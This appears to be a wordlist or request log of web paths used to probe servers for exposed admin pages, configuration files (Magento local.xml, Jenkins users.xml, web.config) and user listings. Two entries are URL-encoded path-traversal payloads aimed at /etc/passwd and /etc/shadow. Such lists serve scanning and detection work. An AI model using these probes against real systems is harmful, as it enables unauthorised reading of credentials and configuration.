/home/edit_user.php
/home/login
/app/etc/local.xml
/admin/admin.php
/v2/api-docs
/spl/api/teardown/file
/_wpeprivate/config.json
/var/jenkins_home/users/users.xml
/clients/MyCRL
/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/passwd
/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/shadow
/administrator
/file.ashx?path=web.config
/Download.aspx?id=4675
/hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true
/wp-json/wp/v2/users/
